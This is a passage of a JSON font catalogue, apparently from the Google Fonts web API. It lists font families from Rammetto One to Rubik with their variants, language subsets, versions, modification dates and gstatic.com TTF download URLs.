        "regular": "http://fonts.gstatic.com/s/rammettoone/v9/LhWiMV3HOfMbMetJG3lQDpp9Mvuciu-_SQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ranchers",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ranchers/v8/zrfm0H3Lx-P2Xvs2AoDYDC79XTHv.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rancho",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rancho/v11/46kulbzmXjLaqZRlbWXgd0RY1g.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ranga",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ranga/v6/C8ct4cYisGb28p6CLDwZwmGE.ttf",
        "700": "http://fonts.gstatic.com/s/ranga/v6/C8cg4cYisGb28qY-AxgR6X2NZAn2.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rasa",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "gujarati",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/rasa/v6/xn7gYHIn1mWmdg52sgC7S9XdZN8.ttf",
        "regular": "http://fonts.gstatic.com/s/rasa/v6/xn7vYHIn1mWmTqJelgiQV9w.ttf",
        "500": "http://fonts.gstatic.com/s/rasa/v6/xn7gYHIn1mWmdlZ3sgC7S9XdZN8.ttf",
        "600": "http://fonts.gstatic.com/s/rasa/v6/xn7gYHIn1mWmdnpwsgC7S9XdZN8.ttf",
        "700": "http://fonts.gstatic.com/s/rasa/v6/xn7gYHIn1mWmdh5xsgC7S9XdZN8.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rationale",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rationale/v12/9XUnlJ92n0_JFxHIfHcsdlFMzLC2Zw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ravi Prakash",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v7",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/raviprakash/v7/gokpH6fsDkVrF9Bv9X8SOAKHmNZEq6TTFw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Recursive",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "vietnamese"
      ],
      "version": "v21",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/recursive/v21/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadDck018vwxjDJCL.ttf",
        "regular": "http://fonts.gstatic.com/s/recursive/v21/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadCCk018vwxjDJCL.ttf",
        "500": "http://fonts.gstatic.com/s/recursive/v21/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadCwk018vwxjDJCL.ttf",
        "600": "http://fonts.gstatic.com/s/recursive/v21/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadBclE18vwxjDJCL.ttf",
        "700": "http://fonts.gstatic.com/s/recursive/v21/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadBllE18vwxjDJCL.ttf",
        "800": "http://fonts.gstatic.com/s/recursive/v21/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadAClE18vwxjDJCL.ttf",
        "900": "http://fonts.gstatic.com/s/recursive/v21/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadArlE18vwxjDJCL.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Red Hat Display",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "700",
        "700italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v4",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/redhatdisplay/v4/8vIQ7wUr0m80wwYf0QCXZzYzUoTQ-jSgZYvdCQ.ttf",
        "italic": "http://fonts.gstatic.com/s/redhatdisplay/v4/8vIS7wUr0m80wwYf0QCXZzYzUoTg-D6kR47NCV5Z.ttf",
        "500": "http://fonts.gstatic.com/s/redhatdisplay/v4/8vIV7wUr0m80wwYf0QCXZzYzUoToDh2EbaDBAEdAbw.ttf",
        "500italic": "http://fonts.gstatic.com/s/redhatdisplay/v4/8vIX7wUr0m80wwYf0QCXZzYzUoTg-AZQbqrFIkJQb7zU.ttf",
        "700": "http://fonts.gstatic.com/s/redhatdisplay/v4/8vIV7wUr0m80wwYf0QCXZzYzUoToRhuEbaDBAEdAbw.ttf",
        "700italic": "http://fonts.gstatic.com/s/redhatdisplay/v4/8vIX7wUr0m80wwYf0QCXZzYzUoTg-AYYaKrFIkJQb7zU.ttf",
        "900": "http://fonts.gstatic.com/s/redhatdisplay/v4/8vIV7wUr0m80wwYf0QCXZzYzUoTofhmEbaDBAEdAbw.ttf",
        "900italic": "http://fonts.gstatic.com/s/redhatdisplay/v4/8vIX7wUr0m80wwYf0QCXZzYzUoTg-AYgaqrFIkJQb7zU.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Red Hat Text",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v3",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/redhattext/v3/RrQXbohi_ic6B3yVSzGBrMxgb60sE8yZPA.ttf",
        "italic": "http://fonts.gstatic.com/s/redhattext/v3/RrQJbohi_ic6B3yVSzGBrMxQbacoMcmJPECN.ttf",
        "500": "http://fonts.gstatic.com/s/redhattext/v3/RrQIbohi_ic6B3yVSzGBrMxYm4QIG-eFNVmULg.ttf",
        "500italic": "http://fonts.gstatic.com/s/redhattext/v3/RrQKbohi_ic6B3yVSzGBrMxQbZ_cGO2BF1yELmgy.ttf",
        "700": "http://fonts.gstatic.com/s/redhattext/v3/RrQIbohi_ic6B3yVSzGBrMxY04IIG-eFNVmULg.ttf",
        "700italic": "http://fonts.gstatic.com/s/redhattext/v3/RrQKbohi_ic6B3yVSzGBrMxQbZ-UHu2BF1yELmgy.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Red Rose",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-10-08",
      "files": {
        "300": "http://fonts.gstatic.com/s/redrose/v3/QdVISTYiLBjouPgEUajvsfWwDtc3MH8y8_sDcjSsYUVUjg.ttf",
        "regular": "http://fonts.gstatic.com/s/redrose/v3/QdVISTYiLBjouPgEUajvsfWwDtc3MH8yrfsDcjSsYUVUjg.ttf",
        "500": "http://fonts.gstatic.com/s/redrose/v3/QdVISTYiLBjouPgEUajvsfWwDtc3MH8yn_sDcjSsYUVUjg.ttf",
        "600": "http://fonts.gstatic.com/s/redrose/v3/QdVISTYiLBjouPgEUajvsfWwDtc3MH8yc_wDcjSsYUVUjg.ttf",
        "700": "http://fonts.gstatic.com/s/redrose/v3/QdVISTYiLBjouPgEUajvsfWwDtc3MH8ySvwDcjSsYUVUjg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Redressed",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/redressed/v11/x3dickHUbrmJ7wMy9MsBfPACvy_1BA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Reem Kufi",
      "variants": [
        "regular"
      ],
      "subsets": [
        "arabic",
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/reemkufi/v9/2sDcZGJLip7W2J7v7wQDb2-4C7wFZQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Reenie Beanie",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/reeniebeanie/v11/z7NSdR76eDkaJKZJFkkjuvWxbP2_qoOgf_w.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Revalia",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-07-15",
      "files": {
        "regular": "http://fonts.gstatic.com/s/revalia/v7/WwkexPimBE2-4ZPEeVruNIgJSNM.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rhodium Libre",
      "variants": [
        "regular"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rhodiumlibre/v5/1q2AY5adA0tn_ukeHcQHqpx6pETLeo2gm2U.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ribeye",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ribeye/v9/L0x8DFMxk1MP9R3RvPCmRSlUig.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ribeye Marrow",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ribeyemarrow/v10/GFDsWApshnqMRO2JdtRZ2d0vEAwTVWgKdtw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Righteous",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/righteous/v9/1cXxaUPXBpj2rGoU7C9mj3uEicG01A.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Risque",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/risque/v8/VdGfAZUfHosahXxoCUYVBJ-T5g.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Roboto",
      "variants": [
        "100",
        "100italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "700",
        "700italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v20",
      "lastModified": "2019-07-24",
      "files": {
        "100": "http://fonts.gstatic.com/s/roboto/v20/KFOkCnqEu92Fr1MmgWxPKTM1K9nz.ttf",
        "100italic": "http://fonts.gstatic.com/s/roboto/v20/KFOiCnqEu92Fr1Mu51QrIzcXLsnzjYk.ttf",
        "300": "http://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmSU5vAx05IsDqlA.ttf",
        "300italic": "http://fonts.gstatic.com/s/roboto/v20/KFOjCnqEu92Fr1Mu51TjARc9AMX6lJBP.ttf",
        "regular": "http://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5WZLCzYlKw.ttf",
        "italic": "http://fonts.gstatic.com/s/roboto/v20/KFOkCnqEu92Fr1Mu52xPKTM1K9nz.ttf",
        "500": "http://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAx05IsDqlA.ttf",
        "500italic": "http://fonts.gstatic.com/s/roboto/v20/KFOjCnqEu92Fr1Mu51S7ABc9AMX6lJBP.ttf",
        "700": "http://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmWUlvAx05IsDqlA.ttf",
        "700italic": "http://fonts.gstatic.com/s/roboto/v20/KFOjCnqEu92Fr1Mu51TzBhc9AMX6lJBP.ttf",
        "900": "http://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmYUtvAx05IsDqlA.ttf",
        "900italic": "http://fonts.gstatic.com/s/roboto/v20/KFOjCnqEu92Fr1Mu51TLBBc9AMX6lJBP.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Roboto Condensed",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v19",
      "lastModified": "2020-09-15",
      "files": {
        "300": "http://fonts.gstatic.com/s/robotocondensed/v19/ieVi2ZhZI2eCN5jzbjEETS9weq8-33mZKCMSbvtdYyQ.ttf",
        "300italic": "http://fonts.gstatic.com/s/robotocondensed/v19/ieVg2ZhZI2eCN5jzbjEETS9weq8-19eDpCEYatlYcyRi4A.ttf",
        "regular": "http://fonts.gstatic.com/s/robotocondensed/v19/ieVl2ZhZI2eCN5jzbjEETS9weq8-59WxDCs5cvI.ttf",
        "italic": "http://fonts.gstatic.com/s/robotocondensed/v19/ieVj2ZhZI2eCN5jzbjEETS9weq8-19e7CAk8YvJEeg.ttf",
        "700": "http://fonts.gstatic.com/s/robotocondensed/v19/ieVi2ZhZI2eCN5jzbjEETS9weq8-32meKCMSbvtdYyQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/robotocondensed/v19/ieVg2ZhZI2eCN5jzbjEETS9weq8-19eDtCYYatlYcyRi4A.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Roboto Mono",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-07-13",
      "files": {
        "100": "http://fonts.gstatic.com/s/robotomono/v12/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_3vuPQ--5Ip2sSQ.ttf",
        "200": "http://fonts.gstatic.com/s/robotomono/v12/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_XvqPQ--5Ip2sSQ.ttf",
        "300": "http://fonts.gstatic.com/s/robotomono/v12/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_gPqPQ--5Ip2sSQ.ttf",
        "regular": "http://fonts.gstatic.com/s/robotomono/v12/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_3vqPQ--5Ip2sSQ.ttf",
        "500": "http://fonts.gstatic.com/s/robotomono/v12/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_7PqPQ--5Ip2sSQ.ttf",
        "600": "http://fonts.gstatic.com/s/robotomono/v12/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_AP2PQ--5Ip2sSQ.ttf",
        "700": "http://fonts.gstatic.com/s/robotomono/v12/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_Of2PQ--5Ip2sSQ.ttf",
        "100italic": "http://fonts.gstatic.com/s/robotomono/v12/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrlnAeW9AJi8SZwt.ttf",
        "200italic": "http://fonts.gstatic.com/s/robotomono/v12/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrnnAOW9AJi8SZwt.ttf",
        "300italic": "http://fonts.gstatic.com/s/robotomono/v12/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrk5AOW9AJi8SZwt.ttf",
        "italic": "http://fonts.gstatic.com/s/robotomono/v12/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrlnAOW9AJi8SZwt.ttf",
        "500italic": "http://fonts.gstatic.com/s/robotomono/v12/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrlVAOW9AJi8SZwt.ttf",
        "600italic": "http://fonts.gstatic.com/s/robotomono/v12/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrm5B-W9AJi8SZwt.ttf",
        "700italic": "http://fonts.gstatic.com/s/robotomono/v12/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrmAB-W9AJi8SZwt.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Roboto Slab",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-06-26",
      "files": {
        "100": "http://fonts.gstatic.com/s/robotoslab/v12/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjojIWWaG5iddG-1A.ttf",
        "200": "http://fonts.gstatic.com/s/robotoslab/v12/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoDISWaG5iddG-1A.ttf",
        "300": "http://fonts.gstatic.com/s/robotoslab/v12/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjo0oSWaG5iddG-1A.ttf",
        "regular": "http://fonts.gstatic.com/s/robotoslab/v12/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjojISWaG5iddG-1A.ttf",
        "500": "http://fonts.gstatic.com/s/robotoslab/v12/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjovoSWaG5iddG-1A.ttf",
        "600": "http://fonts.gstatic.com/s/robotoslab/v12/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoUoOWaG5iddG-1A.ttf",
        "700": "http://fonts.gstatic.com/s/robotoslab/v12/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoa4OWaG5iddG-1A.ttf",
        "800": "http://fonts.gstatic.com/s/robotoslab/v12/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoDIOWaG5iddG-1A.ttf",
        "900": "http://fonts.gstatic.com/s/robotoslab/v12/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoJYOWaG5iddG-1A.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rochester",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rochester/v11/6ae-4KCqVa4Zy6Fif-Uy31vWNTMwoQ.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rock Salt",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rocksalt/v11/MwQ0bhv11fWD6QsAVOZbsEk7hbBWrA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rokkitt",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v19",
      "lastModified": "2020-06-26",
      "files": {
        "100": "http://fonts.gstatic.com/s/rokkitt/v19/qFdb35qfgYFjGy5hukqqhw5XeRgdi1rydpDLE76HvN6n.ttf",
        "200": "http://fonts.gstatic.com/s/rokkitt/v19/qFdb35qfgYFjGy5hukqqhw5XeRgdi1pyd5DLE76HvN6n.ttf",
        "300": "http://fonts.gstatic.com/s/rokkitt/v19/qFdb35qfgYFjGy5hukqqhw5XeRgdi1qsd5DLE76HvN6n.ttf",
        "regular": "http://fonts.gstatic.com/s/rokkitt/v19/qFdb35qfgYFjGy5hukqqhw5XeRgdi1ryd5DLE76HvN6n.ttf",
        "500": "http://fonts.gstatic.com/s/rokkitt/v19/qFdb35qfgYFjGy5hukqqhw5XeRgdi1rAd5DLE76HvN6n.ttf",
        "600": "http://fonts.gstatic.com/s/rokkitt/v19/qFdb35qfgYFjGy5hukqqhw5XeRgdi1oscJDLE76HvN6n.ttf",
        "700": "http://fonts.gstatic.com/s/rokkitt/v19/qFdb35qfgYFjGy5hukqqhw5XeRgdi1oVcJDLE76HvN6n.ttf",
        "800": "http://fonts.gstatic.com/s/rokkitt/v19/qFdb35qfgYFjGy5hukqqhw5XeRgdi1pycJDLE76HvN6n.ttf",
        "900": "http://fonts.gstatic.com/s/rokkitt/v19/qFdb35qfgYFjGy5hukqqhw5XeRgdi1pbcJDLE76HvN6n.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Romanesco",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/romanesco/v9/w8gYH2ozQOY7_r_J7mSn3HwLqOqSBg.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ropa Sans",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ropasans/v10/EYqxmaNOzLlWtsZSScyKWjloU5KP2g.ttf",
        "italic": "http://fonts.gstatic.com/s/ropasans/v10/EYq3maNOzLlWtsZSScy6WDNscZef2mNE.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rosario",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v18",
      "lastModified": "2020-06-26",
      "files": {
        "300": "http://fonts.gstatic.com/s/rosario/v18/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM69GCWczd-YnOzUD.ttf",
        "regular": "http://fonts.gstatic.com/s/rosario/v18/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM68YCWczd-YnOzUD.ttf",
        "500": "http://fonts.gstatic.com/s/rosario/v18/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM68qCWczd-YnOzUD.ttf",
        "600": "http://fonts.gstatic.com/s/rosario/v18/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM6_GDmczd-YnOzUD.ttf",
        "700": "http://fonts.gstatic.com/s/rosario/v18/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM6__Dmczd-YnOzUD.ttf",
        "300italic": "http://fonts.gstatic.com/s/rosario/v18/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQStFwfeIFPiUDn08.ttf",
        "italic": "http://fonts.gstatic.com/s/rosario/v18/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQSo9wfeIFPiUDn08.ttf",
        "500italic": "http://fonts.gstatic.com/s/rosario/v18/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQSr1wfeIFPiUDn08.ttf",
        "600italic": "http://fonts.gstatic.com/s/rosario/v18/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQSlF3feIFPiUDn08.ttf",
        "700italic": "http://fonts.gstatic.com/s/rosario/v18/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQSmh3feIFPiUDn08.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rosarivo",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rosarivo/v8/PlI-Fl2lO6N9f8HaNAeC2nhMnNy5.ttf",
        "italic": "http://fonts.gstatic.com/s/rosarivo/v8/PlI4Fl2lO6N9f8HaNDeA0Hxumcy5ZX8.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rouge Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rougescript/v9/LYjFdGbiklMoCIQOw1Ep3S4PVPXbUJWq9g.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rowdies",
      "variants": [
        "300",
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/rowdies/v2/ptRMTieMYPNBAK219hth5O7yKQNute8.ttf",
        "regular": "http://fonts.gstatic.com/s/rowdies/v2/ptRJTieMYPNBAK21zrdJwObZNQo.ttf",
        "700": "http://fonts.gstatic.com/s/rowdies/v2/ptRMTieMYPNBAK219gtm5O7yKQNute8.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rozha One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rozhaone/v8/AlZy_zVFtYP12Zncg2khdXf4XB0Tow.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rubik",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "hebrew",
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-29",
      "files": {
        "300": "http://fonts.gstatic.com/s/rubik/v11/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-WYi1UE80V4bVkA.ttf",
        "regular": "http://fonts.gstatic.com/s/rubik/v11/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4i1UE80V4bVkA.ttf",
        "500": "http://fonts.gstatic.com/s/rubik/v11/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-NYi1UE80V4bVkA.ttf",
        "600": "http://fonts.gstatic.com/s/rubik/v11/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-2Y-1UE80V4bVkA.ttf",
        "700": "http://fonts.gstatic.com/s/rubik/v11/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-4I-1UE80V4bVkA.ttf",
        "800": "http://fonts.gstatic.com/s/rubik/v11/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-h4-1UE80V4bVkA.ttf",
        "900": "http://fonts.gstatic.com/s/rubik/v11/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-ro-1UE80V4bVkA.ttf",
        "300italic": "http://fonts.gstatic.com/s/rubik/v11/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8sDE0UwdYPFkJ1O.ttf",
        "italic": "http://fonts.gstatic.com/s/rubik/v11/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8tdE0UwdYPFkJ1O.ttf",
        "500italic": "http://fonts.gstatic.com/s/rubik/v11/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8tvE0UwdYPFkJ1O.ttf",
        "600italic": "http://fonts.gstatic.com/s/rubik/v11/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8uDFEUwdYPFkJ1O.ttf",
        "700italic": "http://fonts.gstatic.com/s/rubik/v11/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8u6FEUwdYPFkJ1O.ttf",
